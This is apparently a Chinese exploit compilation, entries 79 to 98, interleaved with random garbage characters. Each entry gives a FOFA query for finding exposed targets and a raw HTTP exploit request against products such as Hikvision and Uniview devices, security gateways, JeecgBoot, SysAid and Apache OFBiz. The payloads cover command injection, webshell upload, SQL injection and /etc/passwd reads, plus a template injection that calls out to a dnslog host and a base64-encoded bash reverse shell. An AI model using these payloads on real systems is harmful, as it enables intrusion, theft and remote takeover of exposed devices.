3 Q+ K1 z. ]+ \# @9 K
. E- W; N6 W8 \
3 r2 ^- h, v! N! y; R4 g- j) z79. BYTEVALUE 百为流控路由器远程命令执行1 j3 a& ?1 K8 z, q; X$ q! u: p4 m7 M9 m
FOFA:BYTEVALUE 智能流控路由器& `" g: y) x1 u+ l. q
GET /goform/webRead/open/?path=|id HTTP/1.1/ X# P0 }8 s! i( H- s# n4 r
Host:IP5 @8 L i- Y& _: \8 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
* S! c% j+ M. w$ Q3 V1 {6 n& P0 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 J. `. r* m R @: S/ H5 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 d' x4 K$ M/ q8 G$ KAccept-Encoding: gzip, deflate
3 }' W1 W5 Y, U0 E; jConnection: close" h6 M, z5 ^; U8 {; Y* y6 n; `% l
Upgrade-Insecure-Requests: 1
' `" D9 ^( r- s; F+ P! n' e+ O% @/ ]; u( o+ A
' f1 I# f0 u* \) g3 r3 |0 t" `80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传0 ?/ L4 {' j3 Q3 F1 S
FOFA:app="速达软件-公司产品"* H. b; u7 E9 e a
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.17 O' H: v ~; W6 t8 w4 K
Host: x.x.x.x
) V: m% @7 h: }: Z0 K. ~0 H" QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( J+ q' O3 ~, B; G. z1 oContent-Length: 27
" C; n+ z" s- VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; r1 A$ t8 `& L% J6 a c. {Accept-Encoding: gzip, deflate0 P: c9 v. F: W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) ^; I5 S% O, ^1 S8 MConnection: close
* I2 k3 y3 L3 ?& B7 g8 r5 h* V( KContent-Type: application/octet-stream
7 C3 Y7 a1 j( D. @* T+ o7 R" V2 }Upgrade-Insecure-Requests: 1
1 ~- U1 J, p+ c w' D1 l Q
$ N& R* l7 a8 y' h5 j5 {5 s& S3 E( |$ S<% out.print("oessqeonylzaf");%>
p* u7 K$ e; _) J) U7 p( t$ ]: I8 ]# c0 ^+ f. a
9 N8 n4 o* w+ d* C4 E9 i3 M
GET /xykqmfxpoas.jsp HTTP/1.10 j5 N, A4 \! R4 U0 Y
Host: x.x.x.x* P* D& j. N$ Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: ?3 S. ?4 j' X9 x0 U1 DConnection: close# ]6 ^) b4 R O7 ^( D
Accept-Encoding: gzip' D/ e r8 `8 o( k; ^
: l% O6 t3 [3 J9 h6 \- V
) r/ D# [' N3 K( W8 ]81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
9 q, g3 l' S$ ~& ~FOFA:app="uniview-视频监控"
- ^/ H0 k5 z- G; l* ]GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
' q5 T; _0 \; x: B0 F; P" T1 mHost: x.x.x.x& n9 {$ \7 R/ q# S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& c0 f, |( s2 {9 pConnection: close
. v# O5 m/ b! }Accept-Encoding: gzip% g, U9 \. y3 s6 v' O" m
" w# D. N3 u5 f, P2 K
- T" P* R. M, e+ {: g8 ]9 g
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
/ ~9 |0 `( ^( p1 ^FOFA:app="思福迪-LOGBASE"0 D) u R# _+ K9 t1 D
POST /bhost/test_qrcode_b HTTP/1.1/ O& M/ C4 E) p& `, O$ b; J3 R
Host: BaseURL# t: [0 h; }" C
User-Agent: Go-http-client/1.1, I4 C9 r6 H- g5 R5 e
Content-Length: 23: L3 F! W5 o) r+ U
Accept-Encoding: gzip9 i$ _2 Q6 U6 e
Connection: close3 q9 W3 V# p3 e" n
Content-Type: application/x-www-form-urlencoded; y* e1 U! `! O9 q) b4 }9 c, C1 I1 n
Referer: BaseURL" {( \4 _' Z P% {* a
* [/ B& W' t6 [3 [6 G/ iz1=1&z2="|id;"&z3=bhost) {3 Z6 z+ d2 z8 _7 z: j0 O$ k: \0 R
8 {$ S. m b4 E6 A- W8 R5 v9 \- h2 T+ D1 {8 H; ^* u# B
83. JeecgBoot testConnection 远程命令执行! M0 `' ~7 Q( l* F3 l
FOFA:title=="JeecgBoot 企业级低代码平台"
$ {, Y* K' z; V9 G% E1 }- ]) B0 N V, G
* a' g8 u q9 W7 I! c- T$ K+ R% o( z& jPOST /jmreport/testConnection HTTP/1.1 F# f( I* e- Z$ ^+ V$ o7 k1 ]
Host: x.x.x.x( n2 V6 ?! R1 K$ t x9 }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 H1 y& s& X% g* m% i/ a6 h! hConnection: close" `5 h5 ?0 a; [, {
Content-Length: 8881! e" `7 l- s9 {3 A% e3 m5 ?
Accept-Encoding: gzip9 J5 ~0 f0 D* y6 G E3 W+ S0 b- y/ V
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"8 X1 E {/ r' B( Y& @" r
Content-Type: application/json: L; `& |! o9 J5 X: |- M$ \( R4 R. X
. n0 k" e. a* K& ~" m& a4 h7 mPAYLOAD+ x9 }* G( S7 z- M; M3 V2 M
! d; M1 ?# N* J2 i2 c
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
4 ~& W+ h' w/ k! L; l( jFOFA:title=="JeecgBoot 企业级低代码平台"% A" G$ ?7 b# ~0 [9 e' P4 D
z3 k# f. F, d
% C% W) R* m) [5 k+ m
) c4 ]8 R0 z) D; o8 T5 n& ?POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
8 x' e! l }/ w0 |9 C5 rHost: 192.168.40.130:8080( E- Q' s+ y, T
User-Agent: curl/7.88.1$ M3 ^, k n3 _
Content-Length: 156
$ ^9 u3 C3 i! Z9 B' Y, LAccept: */*5 l7 u1 j9 n q" r8 l7 M
Connection: close" x- G2 `" t' R' a& H1 n+ J
Content-Type: application/json
2 y5 I1 ^% ]1 S" W& ]' m% F+ B- hAccept-Encoding: gzip
3 `8 x7 N& S/ W/ ?
+ t- e8 Y+ p; c* Z( R{: r f# P: [5 K0 V
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",/ K5 z. i! {- r
"type": "0"& v9 \0 S( b1 v9 Y- C5 O. K8 ] X
}
# Z2 B' l4 Z8 q* ], ~6 _. }3 ?# J
$ X( b( ]9 \' y: q# f+ h7 _
85. SysAid On-premise< 23.3.36远程代码执行
) w$ m% W+ K3 o! R1 bCVE-2023-472468 m- s. r5 a) r* w; ^ h
FOFA:body="sysaid-logo-dark-green.png"
- W2 x0 W" _% t2 b' FEXP数据包如下,注入哥斯拉马
* X7 f s8 I. ~0 m4 J% `1 uPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
* a& t# q. n( z3 I6 zHost: x.x.x.x
: t* \' ^; E0 s1 C8 [2 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 b! d# _8 X3 w* N% Z# GContent-Type: application/octet-stream
2 H1 i' \! {" z9 w6 \6 \Accept-Encoding: gzip
3 a# z0 x2 u* j. }# h5 L \* ]% E F4 j: g: y5 g, e8 N
PAYLOAD
+ y* Z7 k/ z+ s6 h
0 A+ l/ |4 N3 W% `回显URL:http://x.x.x.x/userfiles/index.jsp# q" V' B( s; V) f- ~& M3 [
; g5 Z# Z' f- D8 |/ @( a( g2 q9 Y
86. 日本tosei自助洗衣机RCE z+ g( W8 d6 {" b# t
FOFA:body="tosei_login_check.php"
6 y& n/ F) l f6 m5 s4 a8 {% V. UPOST /cgi-bin/network_test.php HTTP/1.1
1 O$ S! {4 L4 ^2 K* iHost: x.x.x.x
! t3 c5 t& @7 W' V b* xUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36, `) i. n% o" o W
Connection: close1 N. E- Z, Y G ], ~
Content-Length: 44- E! L$ f5 J0 s
Accept: */*
2 a& x$ |; ?" {/ Y+ d- \6 ~9 V0 fAccept-Encoding: gzip' u3 @- u5 B% e6 S4 a ^
Accept-Language: en {: [4 b& `4 j/ _5 a0 ~
Content-Type: application/x-www-form-urlencoded( V/ j' p9 P' K
4 W9 I# O2 B0 Hhost=%0acat${IFS}/etc/passwd%0a&command=ping
$ z* ?9 a U! T. {" p& [- k6 @8 N2 v- \% C* x. @
+ E1 I e2 o8 e9 v; X
87. 安恒明御安全网关aaa_local_web_preview文件上传
4 Y, G9 G5 y/ m; i# _8 r hFOFA:title="明御安全网关"
* {7 i; A& N! n0 R6 l& aPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
; ?! ^ W2 U" O8 p# k. N1 b+ oHost: X.X.X.X. B6 M. t+ h8 K) q4 a2 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 O6 v7 v8 q$ L( ^) I4 T' D0 y
Connection: close) B# c, q( I4 ?$ ^
Content-Length: 1985 d" [* X& H1 N) u6 C2 { Q
Accept-Encoding: gzip
T; q8 Y) f8 I! fContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd% N7 `' v7 `; w% x$ F. c
7 R5 G) i1 v% N; L; e2 J--qqobiandqgawlxodfiisporjwravxtvd
; j8 ~2 f8 g" s, @ l+ RContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
2 c% W( J3 k CContent-Type: text/plain
( H) K e- f# k7 F; T- R. S9 [6 R& H' P4 u/ O4 b
2ZqGNnsjzzU2GBBPyd8AIA7QlDq$ S( L; j5 ]3 p% p. R* n
--qqobiandqgawlxodfiisporjwravxtvd--8 W X. p1 s% |/ R/ j/ S
4 m9 z! S3 k0 I! a: l4 p) p/ M6 }- W7 h( c. F4 S7 s. U" O5 ~ y
/jfhatuwe.php
* R% B. ^0 K! p4 l
, G+ y9 H3 C& V, O5 e; ]88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行 S9 P- S- K, i$ h: z1 [% ~
FOFA:title="明御安全网关"% G0 G& |3 N+ z% a8 E0 N
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
) z' @1 Q8 S0 aHost: x.x.x.xx.x.x.x6 E. u( x7 j3 [6 C0 ?9 V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: t1 a+ ^5 [" _6 b* h! n5 z; l3 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 ]% l/ q2 y* Z5 g% {
Accept-Encoding: gzip, deflate/ H5 B: T7 R$ h& b& P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& H4 {1 n3 ~2 h { g% ?Connection: close
- B9 d6 ~7 T/ c& D! ~
, a! R. e7 ]* e' ~' J( g9 {# M% ?; Z; }! {
/astdfkhl.php
4 C1 s2 ]4 R1 D! l6 V J2 s6 ?/ \* I2 p6 d0 A9 H
89. 致远互联FE协作办公平台editflow_manager存在sql注入
( z J* O$ ^2 J9 ^9 KFOFA:title="FE协作办公平台" || body="li_plugins_download"
" g2 C+ o. i9 S3 oPOST /sysform/003/editflow_manager.js%70 HTTP/1.10 {, `4 K. S' D+ c/ q) o6 B# K
Host: x.x.x.x
) O# a3 [2 l4 ~2 d# kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 p2 |9 z! I$ k4 d7 V/ i; M5 ~0 gConnection: close9 u* E* V# W4 i) [% r
Content-Length: 41
! i- o/ a% \# R0 ]! f: P _- dContent-Type: application/x-www-form-urlencoded
% Z5 ^6 Y' o* K9 y: c& JAccept-Encoding: gzip
4 E0 K, B+ n2 t' a4 S3 \! p- @7 X( t
option=2&GUID=-1'+union+select+111*222--+
; {- Q; I T9 V; ~6 p" q& }' | k8 }
6 M" q/ n1 b, d, v/ V90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
6 }) j( V. i7 ]( V0 I9 Y/ B* nFOFA:icon_hash="-1830859634"; S2 [8 H2 m% d8 R% c; k
POST /php/ping.php HTTP/1.19 t8 o6 T3 w j4 A( U
Host: x.x.x.x
$ t" ]) M# j9 i# L6 M( I6 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.03 Z+ v% X0 n$ Q0 o) X+ R' c
Content-Length: 51
; x; X l4 P9 i3 W! SAccept: application/json, text/javascript, */*; q=0.01
. A; N& l/ b% u8 ?. w3 r } S3 q9 [ {Accept-Encoding: gzip, deflate# U5 Z3 F7 v6 ]/ {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 W" v2 T6 V6 p# a! ] ^
Connection: close
+ c$ Q' W& |: M2 WContent-Type: application/x-www-form-urlencoded8 L: ^: V# Z; h* G# }2 I# r
X-Requested-With: XMLHttpRequest
( U. [; ?; B: R% a( i0 e6 M; d' n
- d- U" J) T9 r- q* ?2 ]. k- ~jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig9 _6 N. H8 [! N$ r7 z* o9 n
/ U3 w# B& U* s! f& H4 d- ~( C+ @
@( _2 N1 V; ~" i91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取- C7 F, @$ w- z
FOFA:title="综合安防管理平台"+ ~ K0 b/ g7 Y% y& H! t
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
5 K+ c6 { [4 k1 N& D6 lHost: your-ip+ o! x P1 V9 {$ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36! C# @6 q2 _* _$ z& y7 r" a. n
Accept-Encoding: gzip, deflate0 M: x% i9 f# s% {" z3 X
Accept: */*
1 o' A0 N" v: _7 w) D, YConnection: keep-alive" o, d# H9 ]1 G; A9 r
3 I( c- R: M9 e& h7 r& C* X7 P z* p2 n
) x3 Z |& J+ o9 `: S8 n# P, k6 d: e7 V92. 海康威视运行管理中心session命令执行
2 X' z% o1 N) K! ]8 qFastjson命令执行; ]( J0 l& ]5 T( t6 k& v c ?
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"6 A8 ? O4 s5 h- J# Q
POST /center/api/session HTTP/1.1- e Y( W9 D; C
Host:
2 l5 v# l% S! L( m$ ?Accept: application/json, text/plain, */*
' [7 v8 P, a6 {3 j1 i7 ]( SAccept-Encoding: gzip, deflate" O- r9 G% h+ O; g, Y* d! F' n* Q# y
X-Requested-With: XMLHttpRequest
6 E$ ]- |' J# K$ s; @6 a6 e; PContent-Type: application/json;charset=UTF-8; C v) h" g7 z7 w/ `
X-Language-Type: zh_CN- v7 u6 B0 h" x% R
Testcmd: echo test
0 \ g0 l. D) {9 Q+ A, i0 C, GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.366 @9 G+ U; R! W: ~& R8 G9 W) n
Accept-Language: zh-CN,zh;q=0.9
" b7 H' R" H8 ~/ a- }" CContent-Length: 5778
: r7 X- R! i) e+ W; W+ G+ W. T0 Z: s4 J; q- ?5 S7 r
PAYLOAD
4 H. B. U9 O7 q, L
: ]6 P5 ^5 L' M! n! l+ T
& _" {1 x3 C* c- |93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传8 \! w, O! X3 Y1 J
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="+ ^' y, u* b. P9 l [5 \
POST /?g=app_av_import_save HTTP/1.1
/ }, }) M: x' U( yHost: x.x.x.x
+ h1 j; r2 M& ^ c! E5 aContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx; T. M1 Q6 M0 G/ i
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# _: A/ R* d# Y! L2 ]8 e5 w0 }; u2 \1 h! {
------WebKitFormBoundarykcbkgdfx
' l" E/ k6 L5 q6 T; |% N4 dContent-Disposition: form-data; name="MAX_FILE_SIZE"
5 n; b& ?. s! D; U# S7 Y8 L* I0 I. ^
" }( O# C) Q1 t+ A100000003 @9 n) r8 N* m( G. w& y1 o( z
------WebKitFormBoundarykcbkgdfx( p7 J1 Z# R& S2 O# s, A
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
( p# `0 Z @3 p7 IContent-Type: text/plain+ H6 s- K' ]8 ^/ |5 b, w
% q$ m E% }. T" s2 X
wagletqrkwrddkthtulxsqrphulnknxa
n% P$ _, D" u5 l2 A9 R1 {------WebKitFormBoundarykcbkgdfx! O- `& }4 I) ^, f( D( u* V0 ^
Content-Disposition: form-data; name="submit_post"
5 N$ G% x' d* s" R% A
, `# d' M' J0 q8 s- jobj_app_upfile; e" ?7 [: K5 B; ?, _: Z9 s8 y: n) a
------WebKitFormBoundarykcbkgdfx- k8 }: }1 L" R' t) c
Content-Disposition: form-data; name="__hash__"
! _* o- E* h/ S. p1 k$ f; w. L& t* A* c
0b9d6b1ab7479ab69d9f71b05e0e9445
1 h, x: B# M4 n U( t/ O------WebKitFormBoundarykcbkgdfx--* [- ^$ N- P, J8 S7 R2 Z: Z( ?
" r3 Z$ N9 ~) f$ \8 `! R8 `& j5 E6 p5 X& W
GET /attachements/xlskxknxa.txt HTTP/1.1& N, d, a# ]) }& e: a$ D6 }2 ]& [' b, u
Host: xx.xx.xx.xx+ d0 _4 V b) _) c! o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 q6 @# j9 a- |/ ^+ F }
8 h3 c9 b0 e! b+ E+ v4 C6 I" H
* }/ _+ _/ U1 G) L& R8 [7 g
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传3 W9 L( X! r8 q# \
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
6 A) u$ {7 a3 EPOST /?g=obj_area_import_save HTTP/1.1
$ y4 q, |( }- C6 ~+ W lHost: x.x.x.x+ B1 ]- q* e; x/ g) U- q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt) N: X3 }9 u4 D. i1 z1 \9 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
9 H: F d2 W2 w9 S
0 o; ?9 x# }1 O8 X4 R3 `! E; |------WebKitFormBoundarybqvzqvmt
/ T& z: F4 W5 ]1 n8 y' ?Content-Disposition: form-data; name="MAX_FILE_SIZE"
1 o4 ]7 V6 O8 p* u& o) _- m# n7 t3 u, j" c% M& J
10000000
. }6 x7 e( A Q9 f" y- y------WebKitFormBoundarybqvzqvmt( A4 k/ u9 {4 o
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"9 Y6 ^1 _; \1 ]% Y
Content-Type: text/plain1 t# W& J+ E% a7 d6 S
: M2 m% Y' E7 O9 J' H7 u
pxplitttsrjnyoafavcajwkvhxindhmu' I. C3 W# m, v; n
------WebKitFormBoundarybqvzqvmt L) v; A/ W9 {& V s
Content-Disposition: form-data; name="submit_post"
* B8 }; t% r, P5 T- E1 e! }/ d- K$ Q% V9 o/ u; [
obj_app_upfile% ?+ K' K- ], v- R0 O! w: k3 Y2 v
------WebKitFormBoundarybqvzqvmt! E; z l3 y( k3 @
Content-Disposition: form-data; name="__hash__"" m5 x1 c7 j9 ]/ m0 r' t- G& ]" }
2 _" o6 Q( b- k
0b9d6b1ab7479ab69d9f71b05e0e9445 H5 j# J! N; f
------WebKitFormBoundarybqvzqvmt--, g7 q- y* _( _ ]
% a; K5 U6 I# d3 {* h1 ^' w& s. l4 y0 x, M* v7 r
0 o" s2 B) k1 U/ g0 N0 F9 C; F+ a! _GET /attachements/xlskxknxa.txt HTTP/1.1
, D7 c9 u8 z3 A2 \- C. g! A4 k XHost: xx.xx.xx.xx
/ u/ r1 o4 C5 f: h4 eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% _. z& K( H0 s5 P9 U$ k
- f3 T4 E# N" h& S7 h4 r; e% @, B6 n' |! ^& i! f; W
8 f5 Y* e" u V& o95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
( t7 I4 s( p; C& S5 U" mCVE-2023-49070# [* e" C( f6 q& V$ ]: e6 P
FOFA:app="Apache_OFBiz"
; R6 q# i& g0 G3 A/ Y5 L6 {: HPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
- y$ c: r/ n* \; W9 gHost: x.x.x.x( g, i3 m& x8 r$ V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
. I* d# `* y" \3 W6 fConnection: close
/ W9 x2 p. ?/ s9 T0 |Content-Length: 889
" Y7 w# N' N% ~7 N, LContent-Type: application/xml
8 P7 F9 X# L& { \3 E3 _$ DAccept-Encoding: gzip
$ a! p0 [- B+ Q4 g, s
4 O# ]& c' _$ W' f0 V<?xml version="1.0"?>
5 }( c. N1 B7 L9 `& ?' u$ u* q<methodCall>
$ E5 S6 F0 C( _4 Z <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
' p) a) o7 i5 o' g' g: ]2 P+ e <params>7 Q2 W! t( G; i% Q. N* [
<param>
. B& k5 @6 h8 h/ @- @ <value>
4 u: C$ q3 }& V( |+ \( W3 n4 X. f# i <struct>
( p e/ x) w# Y; r3 N/ @ <member>( m) ?* D* i& g5 C
<name>test</name>
/ A8 f4 U+ g' _ d5 u9 h9 ? <value>
* H8 _" g F4 U' S" m F <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>; D8 H$ R( Z5 V2 Z
</value>
g* T9 W* g6 z- x3 I) Q </member>
! r6 M' R" Z+ B </struct>
( V, e4 Y; e! ~5 I* r6 b; H( n </value>( _7 X; r) Y5 w% t
</param>
* k& M1 Z7 j1 H/ } </params>+ t8 A* \9 }7 t! t" S ?
</methodCall>+ i2 f* O4 s# O* I
0 ?8 R7 v2 Y8 C) U7 q
& f* x2 V' W& D0 U. x用ysoserial生成payload
3 c2 w6 h6 l" Q9 |- r2 N: wjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"+ V" L/ G* h. R1 S3 T! [
. N& m1 p( a n; `1 g
% g- T: I, T C
将生成的payload替换到上面的POC, F# Z% L- A \7 a+ n9 E
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
( Y3 K& {( Z. Q7 c: \' XHost: 192.168.40.130:84430 ~3 A" c2 C) T
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
( H0 ?7 o* e9 [0 }) RConnection: close7 O' a1 p+ M' z
Content-Length: 889
. ]& b7 [- J2 W0 o: C, R0 D' ^Content-Type: application/xml9 G/ I5 N1 {! c! t# F0 n/ E
Accept-Encoding: gzip
T% J/ j; [$ l/ F+ B
" `1 B" }0 C! S6 E" R2 x Z5 U3 wPAYLOAD
2 U: C. F3 L6 \. Z6 W0 f+ T
9 {3 n( c1 y8 T S2 i1 F8 J. i2 A- f* Q96. Apache OFBiz 18.12.11 groovy 远程代码执行) C1 G! K+ ~4 ^( D8 @2 u
FOFA:app="Apache_OFBiz"
+ e& _4 Y7 \! g9 O2 _6 PPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1% X6 i: r2 ^! y# R, \6 y5 r- d3 a
Host: localhost:8443
, f( l3 x5 ^3 ]: p# x- p" I4 f3 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ x7 F3 I0 h2 ~" X9 L/ ~, g4 d: ~Accept: */*( L* ^. G3 q* v7 A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ M" n* ~; g; g; V
Content-Type: application/x-www-form-urlencoded- N+ j% m6 D. Q6 A# M
Content-Length: 55% S7 w% P+ u2 ^+ K
/ U0 b" @8 }1 G( [1 UgroovyProgram=throw+new+Exception('id'.execute().text);
1 H% T; j: S+ n6 \ ?; m( h. J
: X0 Z8 ~, m2 w9 e# ]$ |1 m
8 ?( ]- m( O. i7 U6 @反弹shell
% {" R/ k# K& p* H* _" B4 S" X在kali上启动一个监听3 Q/ B N7 \: E1 V: Z. W9 O# F O
nc -lvp 7777. y+ A% C1 F8 e
% x# c2 M, \4 ^8 s: X: B' wPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
5 C$ v- `) B0 S- T' W) {5 W% dHost: 192.168.40.130:84433 k/ d+ u5 e: x$ B' G7 A" M/ \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; V% X- j. S+ \/ f2 kAccept: */*
6 T- b1 F: [8 L: E. PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 g+ B- d- J: z8 P4 c/ GContent-Type: application/x-www-form-urlencoded) ]* h- T$ |/ k
Content-Length: 71& t1 M) E# Y; g4 P Q+ G
8 Q1 K0 [# C( {5 B5 u
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();( D/ G4 ?0 L" G5 s
# I7 `6 Q: B: _! `
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行 D) e |+ l- k! \& L
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"0 K' T, S6 f0 J1 B
GET /passport/login/ HTTP/1.18 }8 ~' J1 i. V5 R/ y& E
Host: 192.168.40.130:80855 H4 w! J; t% h2 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) u8 c& n! F7 {, D7 E5 {
Accept-Encoding: gzip$ r+ V" d5 Z' j0 ?2 D$ ]& s
Connection: close8 X1 n6 f* v1 D# B' u O
Cookie: rememberMe=PAYLOAD
/ U3 B2 O, N: M) g/ gX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"7 @6 H& d3 V2 m9 x/ N1 h( _0 P1 \+ v
4 g% D6 M% {; X b7 d2 K( y. _
5 z! N+ Q r/ W8 e" x: V# N98. SpiderFlow爬虫平台远程命令执行9 E5 M5 U( w Q. A# X V7 v" K
CVE-2024-0195
5 i6 E( J, e) m; j& o) c0 yFOFA:app="SpiderFlow"
. m4 m& x! }: x; W# oPOST /function/save HTTP/1.1, r* v% \' W* ?' X$ G, B- |
Host: 192.168.40.130:8088
* c8 g& X; n$ ~; \1 R6 E* vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.03 K/ J% v6 S6 \
Connection: close2 L" `# r3 X8 }; p
Content-Length: 121/ k1 Y3 |- ]% z$ Y& g* X
Accept: */*- S4 ?+ g. z$ r& y2 {
Accept-Encoding: gzip, deflate
7 @% Z2 _( A+ Q3 tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 Y8 C# P: S% Q( `0 w5 Y& ~
Content-Type: application/x-www-form-urlencoded; charset=UTF-8) `% J$ w2 T7 }6 j* x
